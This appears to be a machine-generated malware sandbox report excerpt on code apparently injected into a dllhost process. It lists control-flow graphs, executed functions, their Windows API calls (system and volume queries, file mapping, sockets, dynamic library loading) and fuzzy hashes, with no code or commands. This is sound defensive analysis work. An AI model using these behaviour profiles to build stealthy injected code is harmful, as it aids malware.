13790->13789 13791 255e9c12944 SetErrorMode 13790->13791 13792 255e9c12955 13791->13792 13794 255e9c13970 13792->13794 13795 255e9c13991 13794->13795 13801 255e9c13ae9 13795->13801 13802 255e9c13544 13795->13802 13798 255e9c139c2 13798->13801 13806 255e9c1376c 13798->13806 13799 255e9c13a5e 13800 255e9c13ad3 NtQuerySystemInformation 13799->13800 13799->13801 13800->13801 13801->13789 13803 255e9c1356d 13802->13803 13804 255e9c13637 GetVolumeInformationW 13803->13804 13805 255e9c13672 13803->13805 13804->13805 13805->13798 13807 255e9c1379e 13806->13807 13808 255e9c1387e CreateFileMappingW 13807->13808 13809 255e9c138b8 MapViewOfFile 13808->13809 13810 255e9c138db 13808->13810 13809->13810 13810->13799 13839 255e9c39554 13840 255e9c39578 13839->13840 13841 255e9c3955e 13839->13841 13841->13840 13843 255e9c37fe0 13841->13843 13844 255e9c37ef0 3 API calls 13843->13844 13845 255e9c38011 13844->13845 13845->13840 13926 255e9c12ad2 13927 255e9c12ae7 13926->13927 13928 255e9c12b07 13927->13928 13929 255e9c146c4 free 13927->13929 13929->13928 13815 255e9c12874 13816 255e9c1288e 13815->13816 13817 255e9c12898 13816->13817 13818 255e9c12893 LoadLibraryA 13816->13818 13818->13817 13955 255e9c15454 13956 255e9c154c9 13955->13956 13957 255e9c1546a 13955->13957 13956->13957 13958 255e9c153d4 free 13956->13958 13958->13957

                                                                                                                    Executed Functions

                                                                                                                    Function 00000255E9C13970 Relevance: 1.8, APIs: 1, Instructions: 269nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Information$QuerySystemVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2187445334-0
                                                                                                                    • Opcode ID: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                    • Instruction ID: 441b375de2dbbd887d6588f7293396fa68545d118e4b71f29742ee25077d0830
                                                                                                                    • Opcode Fuzzy Hash: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                    • Instruction Fuzzy Hash: 66919130614F194FE795FB24C8AA7EA77F1FB68302F104A2A944FC31A1EE34D6418B85
                                                                                                                    Function 00000255E9C12B70 Relevance: .3, Instructions: 327COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 240 255e9c12b70-255e9c12c61 call 255e9c13c58 call 255e9c11030 call 255e9c11914 call 255e9c11488 call 255e9c116a0 call 255e9c11488 call 255e9c111dc call 255e9c11488 call 255e9c111dc call 255e9c11488 call 255e9c111dc 264 255e9c12e66-255e9c12e81 call 255e9c11488 call 255e9c117dc 240->264 265 255e9c12c67-255e9c12c6f call 255e9c42856 240->265 274 255e9c12e86-255e9c12ea2 264->274 268 255e9c12c74-255e9c12c79 265->268 270 255e9c12c7b-255e9c12c7e 268->270 271 255e9c12c80-255e9c12c9c 268->271 270->271 273 255e9c12cad-255e9c12caf 270->273 271->273 289 255e9c12c9e-255e9c12cab call 255e9c42856 271->289 275 255e9c12cc5-255e9c12cc8 273->275 276 255e9c12cb1-255e9c12cb4 273->276 283 255e9c12ee7-255e9c12efc call 255e9c13dc4 274->283 284 255e9c12ea4-255e9c12ee4 call 255e9c14b34 call 255e9c15ee6 274->284 275->264 279 255e9c12cce-255e9c12cd1 275->279 276->264 278 255e9c12cba-255e9c12cc3 276->278 278->275 281 255e9c12cd3-255e9c12cda 279->281 287 255e9c12cdc 281->287 288 255e9c12cde-255e9c12ce4 281->288 284->283 287->288 288->281 293 255e9c12ce6-255e9c12d07 call 255e9c11488 call 255e9c117dc 288->293 289->273 302 255e9c12d09-255e9c12d10 293->302 303 255e9c12d16-255e9c12e4a call 255e9c11914 call 255e9c11488 call 255e9c15eec call 255e9c11488 * 2 call 255e9c15eec call 255e9c11488 * 2 call 255e9c15eec call 255e9c11488 * 2 call 255e9c15eec call 255e9c11488 * 2 call 255e9c116a0 call 255e9c11488 call 255e9c15eec call 255e9c11488 302->303 304 255e9c12e4f-255e9c12e55 302->304 303->304 304->302 306 255e9c12e5b-255e9c12e64 304->306 306->274
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                    • Instruction ID: 17f9593bdec9a63c182dbbf47e73687acfa3e31b98be3feda91a2d27b40ba114
                                                                                                                    • Opcode Fuzzy Hash: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                    • Instruction Fuzzy Hash: 59B17335618F184BE706FB25C8A6ADB73F1FB94345F000619A48FD7196DE38EB058B89
                                                                                                                    Function 00000255E9C36F3C Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket$ErrorModegetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 552242919-0
                                                                                                                    • Opcode ID: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                    • Instruction ID: be74464b00b965d60eb7cb544889c886abf2ae373a0c7fce173130f6d9bf1fb0
                                                                                                                    • Opcode Fuzzy Hash: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                    • Instruction Fuzzy Hash: F7415170618A488FE748EF28DC99A9A77F1FB99301F40966DE08BC32A1DF389504CB55
                                                                                                                    Function 00000255E9C1376C Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateMappingView
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3452162329-0
                                                                                                                    • Opcode ID: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                    • Instruction ID: bc41857cf3edc34f46d94730e802bb7047c7d2c2602933e596fa1c78be76f60f
                                                                                                                    • Opcode Fuzzy Hash: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                    • Instruction Fuzzy Hash: 7551A03151CF888BD725EB65C8967EAB7F0FB99301F00492FA4CED2191DE3496058B96
                                                                                                                    Function 00000255E9C37B00 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3755109111-0
                                                                                                                    • Opcode ID: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                    • Instruction ID: 7b942f683f6b2beda92179c4d9aab6ef4fc6d1a302abf43fdc5a75c016bbbe9a
                                                                                                                    • Opcode Fuzzy Hash: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                    • Instruction Fuzzy Hash: 9931C630704D244BFB54FB28ACAA76533F5E75431AF5010E9E80FE21C2DB35CE818695
                                                                                                                    Function 00000255E9C13544 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                    • Instruction ID: 80429fe1d6ffbfb2251181bcd24f34d4eeba67d977308d14ec9e1c9984d9c94b
                                                                                                                    • Opcode Fuzzy Hash: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                    • Instruction Fuzzy Hash: 5C51517151CB848BD76AEF25C8A56EBB7F1FB94301F400A2EA4CED21A1DF749205CB46
                                                                                                                    Function 00000255E9C37EF0 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 98920635-0
                                                                                                                    • Opcode ID: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                    • Instruction ID: 6feb408495bb38829ae8a91e8a948549b737b14ec798e482fd09ad2661197ebb
                                                                                                                    • Opcode Fuzzy Hash: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                    • Instruction Fuzzy Hash: 5121E230714D148FEB48FB389C9E76933E1FB58326F1046A9E82ED72D1EB348D818695
                                                                                                                    Function 00000255E9C128D4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                    • Instruction ID: 07f198d82b3d5b20f6520161ba032f3a8f72532a78764a6a1c6f54416b794af5
                                                                                                                    • Opcode Fuzzy Hash: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                    • Instruction Fuzzy Hash: F6012524B14F290AEE59B37A8C7E77D63F7EB95212F440169580EE21D2DE38CA05874D
                                                                                                                    Function 00000255E9C128A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCallerProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2663294120-0
                                                                                                                    • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                    • Instruction ID: d4cfc53db3be81ba6ca592311e2a5640572b50e0ca1445ac018f1b35bc525daf
                                                                                                                    • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                    • Instruction Fuzzy Hash: 88E0C211B04D190BABA871AE289D67656E6C7DC273704027BE41CC3295ED24CC510398
                                                                                                                    Function 00000255E9C12874 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 225 255e9c12874-255e9c12891 call 255e9c11994 228 255e9c12898-255e9c1289e 225->228 229 255e9c12893-255e9c12896 LoadLibraryA 225->229 229->228
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction ID: 62e723993008f24438c5039982276ee0800d31de9de778101bd5ec05f0b67539
                                                                                                                    • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction Fuzzy Hash: BCD0A711720E0E1BEA48733E1CA937512E5E7DC226F50113AB40DC2281D978CD550308
                                                                                                                    Function 00000255E9C180CC Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 230 255e9c180cc-255e9c180cf 231 255e9c1810d 230->231 232 255e9c180d1-255e9c180e0 230->232 233 255e9c180e2-255e9c180eb call 255e9c20e88 free 232->233 234 255e9c180f1-255e9c1810c call 255e9c1ad2c 232->234 233->234 234->231
                                                                                                                    APIs
                                                                                                                    • free.MSVCRT(?,?,?,?,?,?,?,00000255E9C181D2,?,?,?,?,?,?,?,00000255E9C14660), ref: 00000255E9C180EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2943964639.00000255E9C10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000255E9C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_255e9c10000_dllhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 3c17a6e6e70628ba888634de89261c78aecf94ca69ab89447a007bc2b199894c
                                                                                                                    • Instruction ID: 113aca5de6e9cbe9c0836bd6b6c4b87949d5ffac60e5d175ce0bb64076fc794a
                                                                                                                    • Opcode Fuzzy Hash: 3c17a6e6e70628ba888634de89261c78aecf94ca69ab89447a007bc2b199894c
                                                                                                                    • Instruction Fuzzy Hash: CDE01234611D194BFB98FB6588B9B7433B1EB58302F500099940AD66A2CA35DD92C788